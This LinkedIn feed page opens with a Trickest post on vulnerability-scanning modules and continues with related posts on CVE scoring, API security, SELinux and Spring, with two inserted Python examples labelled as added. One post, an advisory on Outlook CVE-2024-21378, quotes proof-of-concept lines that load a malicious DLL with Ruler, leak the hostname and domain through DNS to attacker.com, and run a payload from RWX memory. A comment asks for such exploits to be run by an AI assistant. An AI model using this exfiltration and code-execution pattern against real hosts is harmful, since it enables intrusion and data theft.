Digging into modules today for those security pros who love refining their processes to perfection. Modules are Trickest-native tools designed for specific security tasks, giving engineers the power 🔋 to automate and customize with both ease and precision. Here are three modules that could elevate your vulnerability scanning to new heights:
• Scan for Misconfigured Software 🔐: Detect a wide range of misconfiguration scenarios that could expose sensitive functions or data, and scan thousands of servers simultaneously with minimized false positives.
• Scan for Outdated Software ⚠️: Identify vulnerable software versions with known exploits from CVE and CNVD databases. PoC scanning helps pinpoint only truly exploitable weaknesses, minimizing false positives.
• Scan for Exposed Secrets 🔑: Uncover exposed tokens, credentials, and sensitive information in HTTP responses. With the ability to scan thousands of URLs at once, it minimizes outgoing requests.
Sign up for a Business account to try them out 🚀
Trickest, Inc.’s Post
More Relevant Posts
-
I developed Pingv4 DNS Checker to quickly scan DNS records and subdomains, providing a reliable and user-friendly tool for system administrators and security professionals. It is designed to be fast, accurate, and lightweight.
Features:
• 🚀 Fast Subdomain Scanning: Quickly queries multiple subdomains and lists the results.
• 📡 Accurate IP Detection: Identifies the IP addresses of subdomains with precision.
• 🖥️ User-Friendly Output: Offers clean, tab-aligned, and easy-to-read output.
• ⚙️ Lightweight and Efficient: Built with minimal dependencies for high performance.
Use Cases:
• Analyzing DNS to identify potential security vulnerabilities.
• Verifying IP mappings for subdomains.
• Network and system configuration analysis.
How to Use?
Perform DNS scanning easily with simple CLI commands:
dns-scan.exe --domain=google.com
For more details and source code, visit GitHub: https://lnkd.in/ddCRMVPW
-
Hey security teams! Interested in streamlining how you create rules and maintain sophisticated logic in your rule sets? Impart Security’s newest update, Security Functions, is a powerful approach to modularizing security policies and rules at runtime. You can effortlessly incorporate complex logic into runtime rule scripts in Impart’s pro-code Rule Builder (learn more at try.imp.art/rule-builder) and seamlessly execute traditionally cumbersome tasks like checksum validations, password strength evaluations, value hashing with various encodings, and more.
Examples of Security Functions include:
✅ Validations for Vehicle Identification Numbers (VIN)
✅ Social Security Numbers (SSN)
✅ Checks for weak passwords
✅ SHA2 hashing
✅ Data redactions
Contact us at try.imp.art to discover how Security Functions can help you easily access and maintain sophisticated logic and follow us here to stay updated with the latest news and product releases.
🔗 Link to the full product update in the comments.
-
Disclaimer: I use the NVD list just as an example; there are others online. Recently I wanted to know how the score for a CVE is decided. This is because I reviewed a couple of CVEs and found them, for the context I had, not that relevant despite their score. My naive idea was: there is an individual or a group that discovers the vulnerability, then there is a public (logged) debate about how important the vulnerability is, and then a consensus emerges to define the score. Not quite. The one (or group) discovering the CVE goes through a formalized process, the CVSS (Common Vulnerability Scoring System). The CVSS provides a formula and variables. The discoverer assigns a value to the variables, providing some justification for it, and then a score is produced. Now, the value of some variables could increase the final score if there are qualifications that make the attack more critical. Making up an example: "this attack is possible provided that the attacker already has access to the following things <list of requirements>". Therefore a CVE is not necessarily relevant if the requirements cannot be easily satisfied in a specific infrastructure. So far so good, though. One has to start somewhere. Having the discovering person/team give an initial score is fine. Anyway, since it seems to me that such publications are like publications in science (or even patents), I would expect some sort of review of the vulnerability and the associated score. In the best case a peer review, with a logged public discussion. Even without public reviews it should be fine anyway. There are at least organizations that review the submitted CVEs, right? Yes. The major CVE lists, for example NVD from NIST, have teams in the background that review the CVEs, as shown in https://lnkd.in/e6Sq8XNR.
Anyway, since time is limited, the reviewing team is possibly overworked, there are a ton of unreviewed CVEs, the CVEs are about many products in IT (that may or may not be easily procured for testing) and so on, it is possible that the reviewing team cannot really spend that much time on each CVE, unless it is a very notable one. The NVD dashboard also shows numbers about the status of CVEs (kudos to them) here https://lnkd.in/efiwwfsm. One can read: CVEs received by NVD in the last year: 12126; analyzed: 4478. That means that there is also quite the backlog in analyzing CVEs and that the reviewing team is never short of work. What do I want to say with all this? I have the feeling, from the information I could collect and read, that most scores in CVEs aren't "the gospel", so to speak. It seems possible that, due to the sheer amount of work, unless something is major and starts a very large public debate, the final score could be simply very similar to the original score given by those that discovered the vulnerability. That could explain why some critical CVEs often do not seem relevant (aside from specific contexts).
Vulnerability Status
nvd.nist.gov
-
Requirements have grown for increasingly longer and more complex passwords - and not without very good reason! This article includes a must-watch brief video that provides a startling demonstration of why we all need strong passwords.
Strong passwords
https://meilu.jpshuntong.com/url-68747470733a2f2f7175646f732d736f6674776172652e636f6d
-
In this meetup, we delve into the often hidden security risks in software development. Using a low-code platform as an example, we illuminate how thorough security analysis can expose significant flaws that would otherwise remain undiscovered. These insights underscore that no type of software - whether SaaS, low-code, or another application - is immune to potential security threats. Our discussion aims to foster a deeper understanding of why it's crucial not to rely solely on surface promises. We invite participants to explore together how critical evaluations and a healthy dose of skepticism can contribute to developing safer and more trustworthy software solutions. https://lnkd.in/dranpmJz
Beyond the Glitter - A realistic view on Software Security
https://meilu.jpshuntong.com/url-68747470733a2f2f7777772e796f75747562652e636f6d/
-
Friday Quizzz! How does the @EnableWebSecurity annotation work in Spring Security? Write the answer in the comments.
A. It allows reading the HttpSecurity configuration bean
B. It enables Spring Security for all the endpoints
C. It enables the default authentication of Spring Security
D. It is mandatory when using Spring Security
BTW, the answer to last week's question is: <dependencies>: Declares the actual dependencies for a project; <dependencyManagement>: Provides version and configuration details that child projects can inherit when they declare the dependency.
For more tips, follow me on: https://lnkd.in/en84AtRh
Don't forget to like, share and comment!
-
💡 Understanding and Fixing 6 Common Security Issues in APIs
Broken Authentication allows unauthorized access due to weak authentication.
How To Fix:
- Use strong methods like OAuth 2.0.
- Implement multi-factor authentication (MFA).
Unrestricted Resource Consumption can lead to denial of service attacks.
How To Fix:
- Implement rate limiting.
- Set resource quotas.
Unrestricted Access to sensitive operations allows unauthorized actions.
How To Fix:
- Use role-based access control (RBAC).
- Perform authorization checks.
Server-Side Request Forgery (SSRF) tricks the server into making harmful requests.
How To Fix:
- Validate and sanitize inputs.
- Whitelist allowed domains.
Security Misconfiguration leaves APIs vulnerable.
How To Fix:
- Keep software updated.
- Disable unnecessary features.
Improper Use of Logout keeps tokens valid even after logout.
How To Fix:
- Expire or invalidate tokens on logout.
- Implement middleware for token validation.
Find the blog link in the comment and follow Osama Haider for more insights! 🔥
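The last item in the list above (tokens that stay valid after logout) is the one most often got wrong, because a self-contained signed token verifies fine until it expires no matter what the user did. The Python below is an added example, not code from the original post or its linked blog: a minimal HMAC-SHA256 bearer-token service whose logout records the token's unique id (jti) in a revocation list, plus a middleware wrapper that rejects revoked, expired and tampered tokens before the handler runs. The token format, the TokenService class, the request dict shape and the in-memory store are assumptions made for this example; the idea that transfers to any stack is that a revocation entry only needs to live as long as the token itself would have.

```python
import base64
import hashlib
import hmac
import json
import os
import time


def _b64e(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(text):
    return base64.urlsafe_b64decode(text + b"=" * (-len(text) % 4))


class TokenService:
    """HMAC-SHA256 signed bearer tokens with a server-side revocation list.

    Assumption for this example: one process, in-memory store. With several API
    instances the revoked set lives in a shared store (e.g. Redis) under the same
    rule: drop the entry once the token would have expired anyway."""

    def __init__(self, secret, ttl_seconds=900):
        self._secret = secret
        self._ttl = ttl_seconds
        self._revoked = {}  # jti -> exp

    def issue(self, subject, now=None):
        now = time.time() if now is None else now
        claims = {"sub": subject, "jti": os.urandom(16).hex(), "exp": int(now + self._ttl)}
        body = _b64e(json.dumps(claims, separators=(",", ":")).encode())
        sig = hmac.new(self._secret, body, hashlib.sha256).digest()
        return (body + b"." + _b64e(sig)).decode()

    def _checked_claims(self, token, now):
        """Signature and expiry only; None if either check fails."""
        try:
            body, sig = token.encode().split(b".")
            given = _b64d(sig)
        except (ValueError, UnicodeEncodeError):
            return None
        expected = hmac.new(self._secret, body, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, given):   # constant-time compare
            return None
        claims = json.loads(_b64d(body))
        if claims.get("exp", 0) <= now:
            return None
        return claims

    def revoke(self, token, now=None):
        """Logout: remember the jti so verify() rejects this token until it would
        have expired on its own. Returns False for tokens that were never valid."""
        now = time.time() if now is None else now
        claims = self._checked_claims(token, now)
        if claims is None:
            return False
        self._revoked[claims["jti"]] = claims["exp"]
        return True

    def verify(self, token, now=None):
        """Claims for a valid, unexpired, unrevoked token; None otherwise."""
        now = time.time() if now is None else now
        self._prune(now)
        claims = self._checked_claims(token, now)
        if claims is None or claims["jti"] in self._revoked:
            return None
        return claims

    def _prune(self, now):
        # Expired tokens fail the exp check anyway, so their jti need not be kept.
        for jti in [j for j, exp in self._revoked.items() if exp <= now]:
            del self._revoked[jti]


def require_token(svc):
    """Middleware factory: every request passing through is checked against the
    signature, the expiry and the revocation list. Returns (status, body)."""
    def wrap(handler):
        def middleware(request, now=None):
            auth = request.get("headers", {}).get("Authorization", "")
            if not auth.startswith("Bearer "):
                return 401, {"error": "missing bearer token"}
            claims = svc.verify(auth[len("Bearer "):], now)
            if claims is None:
                return 401, {"error": "invalid, expired or revoked token"}
            return handler(request, claims)
        return middleware
    return wrap


def whoami(request, claims):
    return 200, {"sub": claims["sub"]}


if __name__ == "__main__":
    svc = TokenService(os.urandom(32))  # secret: load from a secret store in real code
    protected = require_token(svc)(whoami)
    tok = svc.issue("alice")
    req = {"headers": {"Authorization": "Bearer " + tok}}
    print(protected(req))   # 200 while logged in
    svc.revoke(tok)         # logout
    print(protected(req))   # 401 afterwards, although the signature is still valid
```

Keep the TTL short: the revocation list is bounded by the number of logouts within one TTL, and a stolen token that was never explicitly logged out still dies at exp.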
-
The CVE-2024-21378 vulnerability in Microsoft Outlook allows remote code execution through malicious COM forms. Security researchers have released proof-of-concept code demonstrating how to exploit this flaw. The example code, written in C, is compiled into a DLL that is loaded into Outlook using the "Ruler" tool with the command:
ruler [auth-params] form add-com [attack-params] --dll ./test.dll
Once loaded, the DLL sends the PC's hostname and domain name to a malicious DNS resolver, as seen in this excerpt:
std::wstring dns_resolve_address = L"new.d%USERDOMAIN%.u%COMPUTERNAME%.attacker.com";
It then allocates memory, copies a payload into it, and executes it in a separate thread:
LPVOID payload_memory = VirtualAlloc(NULL, payload_zx, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy_s(payload_memory, payload_zx, rawData, payload_zx);
g_threadH = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)((ptr_uint)payload_memory + (ptr_uint)payload_EP_offset), dns_name_allocated, 0, NULL);
Although the payload in this PoC is harmless, in a real attack it would allow executing arbitrary code. Administrators should update Outlook with the latest patches. Antivirus developers can use this code to create and test detections. Through a collaborative approach between researchers and vendors, we can strengthen security against threats like CVE-2024-21378. Stay informed about the latest advisories and apply recommended mitigations.
https://lnkd.in/eN-yjHjp
https://lnkd.in/eG4H3PxR
DLL code for testing CVE-2024-21378 in MS Outlook
gist.github.com
-
Understanding ls -Zd /var/ftp
Breakdown of the Command
• ls: This is the command to list directory contents.
• -Z: This option displays security context information. This is often used in systems with SELinux enabled to view security labels associated with files and directories.
• -d: This option displays directory information without listing the contents of the directory.
• /var/ftp: This is the directory you want to list. It's commonly used as the root directory for FTP services.
What the Command Does
In essence, ls -Zd /var/ftp will:
• List the directory /var/ftp.
• Display the security context information (if SELinux is enabled) for /var/ftp.
• Avoid listing the contents of the directory itself.
Why Use This Command?
• Security Checks: If SELinux is configured, checking the security context can help identify potential security issues.
• Directory Information: You might use it to quickly check the permissions, ownership, and security context of the /var/ftp directory without seeing its contents.
• Debugging FTP Issues: Understanding the directory's properties can aid in troubleshooting FTP-related problems.
Additional Notes
If SELinux is not enabled, the -Z option might not produce any additional output. To list the contents of /var/ftp with security context information, you would use ls -Z /var/ftp.
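The post above explains the command but not what to do with its output, so here is an added example (not from the original post): Python that takes `ls -Z`-style lines, splits each SELinux context into its user:role:type:level fields, and flags entries under an FTP root whose type is not one the FTP daemon can serve. The sample listing is constructed for the example, and the set of acceptable types is an assumption about the targeted policy (public_content_t and public_content_rw_t are the types normally applied to /var/ftp); on a real host confirm it with `matchpathcon /var/ftp` or `sesearch -A -s ftpd_t -c file -p read`, and relabel wrong entries with `restorecon -Rv /var/ftp`.

```python
import re
from typing import Dict, List, Optional, Tuple

# An SELinux context is user:role:type:level. The level may itself contain colons
# (MLS ranges such as s0-s0:c0.c1023), so the first three fields exclude ':' and
# the level takes whatever is left.
CONTEXT_RE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<role>[^:\s]+):(?P<type>[^:\s]+):(?P<level>\S+)$"
)

# Assumption for this example: types ftpd_t may read under an anonymous FTP root
# in the targeted policy. Verify on your system with:
#   sesearch -A -s ftpd_t -c file -p read
EXPECTED_FTP_TYPES = {"public_content_t", "public_content_rw_t"}

# Constructed `ls -Z` output (context, then name); not taken from a real host.
# The '?' line is what ls prints when no context is available.
SAMPLE_LS_Z = """\
system_u:object_r:public_content_t:s0 /var/ftp
system_u:object_r:public_content_t:s0 pub
system_u:object_r:public_content_rw_t:s0-s0:c0.c1023 incoming
unconfined_u:object_r:user_home_t:s0 uploads
? README
"""


def parse_context(ctx: str) -> Optional[Dict[str, str]]:
    """'system_u:object_r:public_content_t:s0' -> its four fields; None for '?'
    (SELinux disabled, or a filesystem without labels)."""
    m = CONTEXT_RE.match(ctx)
    return m.groupdict() if m else None


def parse_ls_z(output: str) -> List[Tuple[str, Optional[Dict[str, str]]]]:
    """Each `ls -Z` line is '<context> <name>'; the name may contain spaces."""
    rows = []
    for line in output.splitlines():
        if not line.strip():
            continue
        ctx, _, name = line.partition(" ")
        rows.append((name, parse_context(ctx)))
    return rows


def find_mislabeled(output: str, expected_types) -> List[Tuple[str, Optional[str]]]:
    """Entries the FTP daemon will be denied access to (or that carry no label).
    Returns (name, type) pairs; type is None when there was no context at all.
    The usual fix for a wrong type is `restorecon -Rv /var/ftp`, which applies
    the label `matchpathcon` says the policy expects."""
    bad = []
    for name, ctx in parse_ls_z(output):
        if ctx is None:
            bad.append((name, None))              # unlabeled
        elif ctx["type"] not in expected_types:
            bad.append((name, ctx["type"]))       # labeled, but the wrong type
    return bad


if __name__ == "__main__":
    for name, t in find_mislabeled(SAMPLE_LS_Z, EXPECTED_FTP_TYPES):
        print(f"{name}: {t or 'no SELinux context'}")
```

In the sample, `uploads` is caught because a file copied in from a home directory keeps user_home_t, which ftpd_t cannot read even though the Unix mode bits look fine; that is exactly the class of problem the post's "Debugging FTP Issues" bullet refers to.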
-
On October 25, 2024, Spring announced CVE-2024-38821, a critical vulnerability that allows attackers to access restricted resources under specific conditions. I just published an article detailing this vulnerability to help you better understand and determine if you are impacted. While RASP can be useful, it may not detect the vulnerability. The effectiveness of ADRs may also differ based on implementation. A proof of concept (PoC) is available here: https://lnkd.in/dnNJQQai Link to the article: https://lnkd.in/dNNpWjMx
Spring WebFlux Authorization Bypass: CVE-2024-38821 Explained
deep-kondah.com
Senior CyberSec Analyst and AppSec SME at World Food Programme
2mo...(if all this is NOT super-cool...I really don't know what it is....!) -> would totally love to see it invoked via single API call by an AI assistant...